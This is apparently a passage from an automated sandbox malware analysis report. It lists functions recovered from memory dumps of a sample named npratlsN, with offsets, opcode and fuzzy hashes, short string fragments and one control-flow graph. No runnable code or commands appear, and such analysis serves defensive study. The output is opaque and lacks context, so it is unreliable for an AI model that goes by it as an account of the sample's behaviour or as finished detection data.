                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 4c2cf36a01989b9ecf938ea1addb0b6c0f1d967e9a5ab2f461b01c9859c81f99
                                                                                                                                                                          • Instruction ID: c0c975e3d1538802cf23b082d15bbb78038d936220a1b96237b5dee4fb4db86a
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c2cf36a01989b9ecf938ea1addb0b6c0f1d967e9a5ab2f461b01c9859c81f99
                                                                                                                                                                          • Instruction Fuzzy Hash: C9D1A074E01218CFDB54DFA9C990B9DBBB2BF89300F1081A9D909AB3A4DB359D85CF51
                                                                                                                                                                          Function 2C880E38 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089414791.000000002C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c880000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 6bbe839d597f09f95ea459a080d86525397eee4153a6d9d7c6818d5ddcfa0ef4
                                                                                                                                                                          • Instruction ID: d089f2f57b294ea97348d3df3893d2c80ad469ad978b27031e456a5d800aa7f0
                                                                                                                                                                          • Opcode Fuzzy Hash: 6bbe839d597f09f95ea459a080d86525397eee4153a6d9d7c6818d5ddcfa0ef4
                                                                                                                                                                          • Instruction Fuzzy Hash: 9FC1A174E01258CFDB54DFA5C994B9DBBB2BF88300F2081A9D809AB355DB359E85CF50
                                                                                                                                                                          Function 2C891EA8 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 5cbdee5ad0505c60f86c06796f39073b2f4bbf0c431104385be3dfd0e7acfcb4
                                                                                                                                                                          • Instruction ID: 5f7862aa340347f65f0bbd18fa8e3b9a1e779420d97fc48ba499447cc4e3198c
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cbdee5ad0505c60f86c06796f39073b2f4bbf0c431104385be3dfd0e7acfcb4
                                                                                                                                                                          • Instruction Fuzzy Hash: 2FC1C274E00218CFDB14DFA5C994B9DBBB2BF89300F2081A9D809AB395DB359E85CF51
                                                                                                                                                                          Function 2C881431 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089414791.000000002C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c880000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ;{+
                                                                                                                                                                          • API String ID: 0-1662407290
                                                                                                                                                                          • Opcode ID: 32954dace73d4b26e377411f589fb2272c06db01b66f44e52b3fd079cddefe9f
                                                                                                                                                                          • Instruction ID: 875631aace55e3f9b9fba57dc39e7636eeec9b99c3184babbb1ee34d86c99ee2
                                                                                                                                                                          • Opcode Fuzzy Hash: 32954dace73d4b26e377411f589fb2272c06db01b66f44e52b3fd079cddefe9f
                                                                                                                                                                          • Instruction Fuzzy Hash: 4AA1F370D00218CFEB14DFA9C994BEDBBB1FF89300F209269E509AB295DB749985CF50
                                                                                                                                                                          Function 2C881440 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089414791.000000002C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c880000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ;{+
                                                                                                                                                                          • API String ID: 0-1662407290
                                                                                                                                                                          • Opcode ID: c0973dddc610c77ccb97457efdb9162ec97ec0c3589ca0e2a04851e506d58aac
                                                                                                                                                                          • Instruction ID: 288e4cf5c3066405fc8e96c2455273550e25ecb1ae67273bea71bdf2011be1f4
                                                                                                                                                                          • Opcode Fuzzy Hash: c0973dddc610c77ccb97457efdb9162ec97ec0c3589ca0e2a04851e506d58aac
                                                                                                                                                                          • Instruction Fuzzy Hash: DDA11370D00218CFEB14DFA9C984BEDBBB1FF89300F209269E519A72A5DB749985CF50
                                                                                                                                                                          Function 2C905328 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089726295.000000002C900000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c900000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 7c2403058b79c5a18af4fc8a692ed01b45699651d2107a552126dfb747102d9f
                                                                                                                                                                          • Instruction ID: 7a97ba610fac68cc52555b206c1a1faf966a7ef191e755feed21e6e7201962bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 7c2403058b79c5a18af4fc8a692ed01b45699651d2107a552126dfb747102d9f
                                                                                                                                                                          • Instruction Fuzzy Hash: E5513DB5D042189FDF04CFBAD8646DEBBB6EBAA310F14E8A9D404A7205DB341946DB50
                                                                                                                                                                          Function 2C94ECD8 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 1b3f4b6cfc2f4fd3b688a3603f96c20b821c8ed6c8b61d4f763158792c848b44
                                                                                                                                                                          • Instruction ID: 247b39aa879dae27540d7cb1cff6a14139965a7e3136760e9164ba9174bde539
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b3f4b6cfc2f4fd3b688a3603f96c20b821c8ed6c8b61d4f763158792c848b44
                                                                                                                                                                          • Instruction Fuzzy Hash: C081B374E00258CFDB14DFA9D990ADEBBB2BF88304F608169D404BB398DB359986CF50
                                                                                                                                                                          Function 2C947618 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 8c4be27c265489783685b98e6a850f71f76527f2ef16f8aaf8566ec6e6dbc567
                                                                                                                                                                          • Instruction ID: ac06ba0c35aabbcf24a3be469d80721ca58a3827783ed5eb535d9cfe55803219
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c4be27c265489783685b98e6a850f71f76527f2ef16f8aaf8566ec6e6dbc567
                                                                                                                                                                          • Instruction Fuzzy Hash: AF81B274E00258CFDB14DFA9D990AEDBBB2BF88304F608169D405BB398DB359986CF50
                                                                                                                                                                          Function 2C94EFF8 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 2b80463b50cd103ea36d6323473711f1273e0413eefff78f0fdad5c8e0c1512f
                                                                                                                                                                          • Instruction ID: 78935e2658baff917b536fb1a95f2c025b6783ea5a7e0a2a738b271b8cd4329d
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b80463b50cd103ea36d6323473711f1273e0413eefff78f0fdad5c8e0c1512f
                                                                                                                                                                          • Instruction Fuzzy Hash: 6781B274E00259CFDB14DFA9D990ADDBBB2BF88300F608169D405BB398DB359986CF50
                                                                                                                                                                          Function 2C956440 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: b627ca57743f716e8d80a65e3ad1900a6c85b7877ccb59cbf12b11ddcea10145
                                                                                                                                                                          • Instruction ID: 5af82fa04f4fc623e62f54929bd06117686f0786d8c0a86097b47999e4325626
                                                                                                                                                                          • Opcode Fuzzy Hash: b627ca57743f716e8d80a65e3ad1900a6c85b7877ccb59cbf12b11ddcea10145
                                                                                                                                                                          • Instruction Fuzzy Hash: EA81B374E01258CFDB14DFA9D990ADDBBB2BF88300F608569D405BB398DB359986CF50
                                                                                                                                                                          Function 2C8965B0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: cd83da0d0c289542db27022ef6baafdd6d4046d22b5b6c6698e1118c86a75e83
                                                                                                                                                                          • Instruction ID: f073d893db7f06c279c1ec9c50fc8e99614f83d97f8f90c83e8bf04506c81008
                                                                                                                                                                          • Opcode Fuzzy Hash: cd83da0d0c289542db27022ef6baafdd6d4046d22b5b6c6698e1118c86a75e83
                                                                                                                                                                          • Instruction Fuzzy Hash: D741B2B0D01218CBEB54DFAAC9447DEBBF2BF89304F20D169D418AB294DB355A46CF54
                                                                                                                                                                          Function 2C897AE0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: f1e00937896e707bf44f9b01da41a41d7df83975d12ca0bb252bfdb198c9cdbc
                                                                                                                                                                          • Instruction ID: c80afa75a5514b800276e2750578c80f7f6dd3cba1bd8d6e14bbc1c9b9a8ac19
                                                                                                                                                                          • Opcode Fuzzy Hash: f1e00937896e707bf44f9b01da41a41d7df83975d12ca0bb252bfdb198c9cdbc
                                                                                                                                                                          • Instruction Fuzzy Hash: 8441C4B0E01658CFDB08DFAAD9506DEFBF2AF89304F24D529D409AB264DB345946CF50
                                                                                                                                                                          Function 2C89B970 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: e9ff550f2b5394153c80ff5809b9db3b2e0a48a3d5510880f986bb84a2b6b579
                                                                                                                                                                          • Instruction ID: 64cca8cdd8522839ae5ed81b150e70695cd6231ca8918fc83174a3036a70e9e0
                                                                                                                                                                          • Opcode Fuzzy Hash: e9ff550f2b5394153c80ff5809b9db3b2e0a48a3d5510880f986bb84a2b6b579
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F41B370E05258CFDB18DFAAD940ADEFBF2AF89300F20D129D408AB265DB345946CF95
                                                                                                                                                                          Function 2C891E9B Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 3de787e665caee6cd32eca97f4019cc7a6df9fdad70e3fc63f3069844a3fcb71
                                                                                                                                                                          • Instruction ID: 48f96e8478b8c9014b2c6071cfbeaf72877ecd9b7938ffff9aeea256a16bad46
                                                                                                                                                                          • Opcode Fuzzy Hash: 3de787e665caee6cd32eca97f4019cc7a6df9fdad70e3fc63f3069844a3fcb71
                                                                                                                                                                          • Instruction Fuzzy Hash: 8641E270E05248CBEB18DFEADA506DEFBF2AF89300F20D129D419AB255DB345946CF51
                                                                                                                                                                          Function 2C940E87 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 7eea07e3cde8b33e68371de0e336d99f096e8f3dacae71d05c5afc4da4da277d
                                                                                                                                                                          • Instruction ID: 984f140aade557d662226bafbb808e8d9e2b4770c6545b79a1fe34eb170892a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 7eea07e3cde8b33e68371de0e336d99f096e8f3dacae71d05c5afc4da4da277d
                                                                                                                                                                          • Instruction Fuzzy Hash: BF41B070E012188BDB18DFAAD9447DEBBF2BF88304F20D16AD418BB254EB345946CF50
                                                                                                                                                                          Function 2C94ECC8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: a1261572e81eefc270a864bfedf97b3c866c0e00b86dc2136b7d2cd4ff765bd3
                                                                                                                                                                          • Instruction ID: 1d4f9fb44f93fea1f45385dfda774c45a73592a044cd1641906c6ef434e7f404
                                                                                                                                                                          • Opcode Fuzzy Hash: a1261572e81eefc270a864bfedf97b3c866c0e00b86dc2136b7d2cd4ff765bd3
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C31F074E01258CBDB18DFAAD8406DEFBF6AF89300F10D16AD418BB295EB345946CF50
                                                                                                                                                                          Function 2B7CF0C9 Relevance: .7, Instructions: 719COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 156e0b274267da48df3d463da7e208c37b69653e273bc32994ac0c7f0b009cac
                                                                                                                                                                          • Instruction ID: cb6920c561dbdc528c844918e0b6fdb32a1c16c36babbcc4801ea0856818801f
                                                                                                                                                                          • Opcode Fuzzy Hash: 156e0b274267da48df3d463da7e208c37b69653e273bc32994ac0c7f0b009cac
                                                                                                                                                                          • Instruction Fuzzy Hash: 9972C174E012298FDB64DF69C990BDEBBB2BB49300F1091E9E508AB355DB349E85CF50
                                                                                                                                                                          Function 2C88178B Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089414791.000000002C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c880000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 68b1b683d5a33ffea7925e37db3ddbfa80c5b1f01b56e77e8f781fccb1feac1c
                                                                                                                                                                          • Instruction ID: 4eb0e22f23b35db45587b809a1658d7af85be0e333cb47f5f22cde7f08d28731
                                                                                                                                                                          • Opcode Fuzzy Hash: 68b1b683d5a33ffea7925e37db3ddbfa80c5b1f01b56e77e8f781fccb1feac1c
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D910374D00218CFEB14DFA8C984BEDBBB1FF49314F209269E519AB295DB749984CF50
                                                                                                                                                                          Function 2B7CD481 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3e37e97c24a87162ec2d425f601c899aa844bc6c03510c7596773970a9e9a2bc
                                                                                                                                                                          • Instruction ID: b7058133afa808d2370842c0af3882e26cdc67f509950565096917dd8b37849f
                                                                                                                                                                          • Opcode Fuzzy Hash: 3e37e97c24a87162ec2d425f601c899aa844bc6c03510c7596773970a9e9a2bc
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A51A774E01208DFDB18DFA9D594A9EBBF2EF88300F209429E915BB364DB359945CF10
                                                                                                                                                                          Function 2B7CD490 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f98f47a8bea7ebba10c95186dcbd5a9a70b13422852b09f2cea340090a8a8c69
                                                                                                                                                                          • Instruction ID: 01494a8d67a99e3e549983eb7332fe2a80bf59d74f48e9ac1eefe79502268639
                                                                                                                                                                          • Opcode Fuzzy Hash: f98f47a8bea7ebba10c95186dcbd5a9a70b13422852b09f2cea340090a8a8c69
                                                                                                                                                                          • Instruction Fuzzy Hash: 9751A774E00208DFDB18DFAAD594A9EBBF2EF89300F208029E815BB364DB359945CF50
                                                                                                                                                                          Function 2B7C7320 Relevance: 31.9, Strings: 25, Instructions: 699COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 678 2b7c7320-2b7c780e 753 2b7c7814-2b7c7824 678->753 754 2b7c7d60-2b7c7d95 678->754 753->754 755 2b7c782a-2b7c783a 753->755 758 2b7c7d97-2b7c7d9c 754->758 759 2b7c7da1-2b7c7dbf 754->759 755->754 757 2b7c7840-2b7c7850 755->757 757->754 760 2b7c7856-2b7c7866 757->760 762 2b7c7e86-2b7c7e8b 758->762 771 2b7c7e36-2b7c7e42 759->771 772 2b7c7dc1-2b7c7dcb 759->772 760->754 761 2b7c786c-2b7c787c 760->761 761->754 764 2b7c7882-2b7c7892 761->764 764->754 765 2b7c7898-2b7c78a8 764->765 765->754 767 2b7c78ae-2b7c78be 765->767 767->754 768 2b7c78c4-2b7c78d4 767->768 768->754 770 2b7c78da-2b7c78ea 768->770 770->754 773 2b7c78f0-2b7c7d5f 770->773 777 2b7c7e59-2b7c7e65 771->777 778 2b7c7e44-2b7c7e50 771->778 772->771 779 2b7c7dcd-2b7c7dd9 772->779 788 2b7c7e7c-2b7c7e7e 777->788 789 2b7c7e67-2b7c7e73 777->789 778->777 787 2b7c7e52-2b7c7e57 778->787 784 2b7c7dfe-2b7c7e01 779->784 785 2b7c7ddb-2b7c7de6 779->785 790 2b7c7e18-2b7c7e24 784->790 791 2b7c7e03-2b7c7e0f 784->791 785->784 797 2b7c7de8-2b7c7df2 785->797 787->762 788->762 869 2b7c7e80 call 2b7c7f18 788->869 789->788 799 2b7c7e75-2b7c7e7a 789->799 795 2b7c7e8c-2b7c7eae 790->795 796 2b7c7e26-2b7c7e2d 790->796 791->790 803 2b7c7e11-2b7c7e16 791->803 804 2b7c7ebe 795->804 805 2b7c7eb0 795->805 796->795 800 2b7c7e2f-2b7c7e34 796->800 797->784 807 2b7c7df4-2b7c7df9 797->807 799->762 800->762 803->762 809 2b7c7ec0-2b7c7ec1 804->809 805->804 808 2b7c7eb7-2b7c7ebc 805->808 807->762 808->809 869->762
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ({+$4{+$@{+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$~o+$$^q$$^q
                                                                                                                                                                          • API String ID: 0-3021506185
                                                                                                                                                                          • Opcode ID: 76e262f788168f09b2d868f4253c6e4fa78cc98256d04282cdd9dd3a5228678b
                                                                                                                                                                          • Instruction ID: ada363644e850acc2d4e751bb4cca2583eb9b036ce459767b3c6a359dac2fedf
                                                                                                                                                                          • Opcode Fuzzy Hash: 76e262f788168f09b2d868f4253c6e4fa78cc98256d04282cdd9dd3a5228678b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E523174A00218CFEF149BA8C990B9EBB77FF84340F1485A9D00AAB3A5DF359D859F51
                                                                                                                                                                          Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_1_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2598563909-0
                                                                                                                                                                          • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                                                                                                          • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                                                                                                          • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C
                                                                                                                                                                          Function 2B7C6581 Relevance: 10.5, Strings: 8, Instructions: 454COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
